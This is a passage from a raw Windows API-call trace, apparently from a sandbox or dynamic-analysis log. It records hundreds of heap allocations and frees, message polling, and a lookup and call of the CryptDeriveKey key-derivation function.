lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0200.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0200.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0200.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0200.439] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0200.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0200.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0200.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0200.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0200.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0200.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0200.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0200.439] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0200.439] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0200.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0200.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0200.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0200.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0200.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0200.439] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0200.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0200.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0200.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a10 [0200.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0200.440] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0200.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0200.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0200.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0200.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0200.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0200.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0200.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0200.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0200.440] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0200.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0200.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a10 [0200.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0200.441] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0200.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0200.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0200.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0200.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0200.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0200.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0200.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0200.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0200.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0200.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0200.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0200.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0200.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0200.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0200.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0200.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0200.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0200.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0200.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0200.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0200.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0200.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0200.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0200.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0200.442] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0200.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0200.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0200.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0200.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0200.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0200.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0200.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0200.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0200.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0200.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0200.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0200.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0200.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0200.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0200.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0200.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0200.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0200.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0200.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0200.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0200.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0200.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0200.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0200.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0200.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0200.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0200.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0200.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0200.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0200.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0200.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0200.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0200.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0200.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0200.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0200.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0200.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0200.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0200.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0200.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0200.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0200.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0200.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0200.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0200.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0200.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0200.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0200.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0200.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0200.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e509c8 [0200.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e509c8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0200.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0200.445] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0200.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0200.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0200.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0200.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0200.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0200.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0200.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0200.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0200.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0200.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0200.445] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87410, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87590) returned 1 [0200.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0200.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0200.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0200.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0200.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0200.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0200.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0200.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0200.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0200.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0200.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0200.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0200.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0200.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0200.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0200.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0200.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0200.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0200.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0200.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0200.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0200.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0200.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0200.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0200.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0200.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0200.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0200.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0200.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0200.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0200.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0200.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0200.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0200.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0200.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0200.447] 